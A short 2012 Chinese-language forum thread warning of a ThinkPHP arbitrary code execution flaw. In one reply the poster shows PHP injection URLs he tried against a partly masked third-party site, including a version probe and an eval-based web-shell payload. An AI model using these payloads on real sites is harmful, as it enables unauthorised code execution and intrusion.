首页 注册 登录
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
RANDOM.org 密码生成器
uBlock
Authy
LastPass
FreebuF.com
Beebeeto
Dashlane 密码管理器
广告
ihacku
V2EX  ›  信息安全

ThinkPHP framework 任意代码执行漏洞预警

  •   
  •   ihacku · 2012-04-09 17:14:49 +08:00 · 4836 次点击
    这是一个创建于 4398 天前的主题,其中的信息可能已经有所发展或是发生改变。
    http://zone.wooyun.org/index.php?do=view&id=44
  • 代码执行
  • framework
  • thinkphp
    3 条回复    1970-01-01 08:00:00 +08:00
    mywaiting
        1
    mywaiting  
       2012-04-09 17:21:13 +08:00
    乌云多了个水区后,我显然多了个可以去的好地方
    ihacku
        2
    ihacku  
    OP
       2012-04-09 18:20:17 +08:00
    本来我是刚买完票 随手用AWS测试个站 报PHP code injection
    http://taot**.net/events/content/id/${@print(md5(acunetix_wvs_security_test))}
    后来才看到乌云上的帖子的
    http://taot**.net/events/content/id/${@print(THINK_VERSION)}
    版本2.1 漏洞影响到的版本包括2.1、2.2和3.0
    不知道具体怎么利用 试着在后面加了一句话
    http://taot**.net/events/content/id/${@eval($_POST[cmd])}
    都是一闪就过去了
    ihacku
        3
    ihacku  
    OP
       2012-04-09 18:22:26 +08:00
    唔 代码被转掉了
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   我们的愿景   ·   实用小工具   ·   3293 人在线   最高记录 6543   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 26ms · UTC 14:09 · PVG 22:09 · LAX 07:09 · JFK 10:09
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.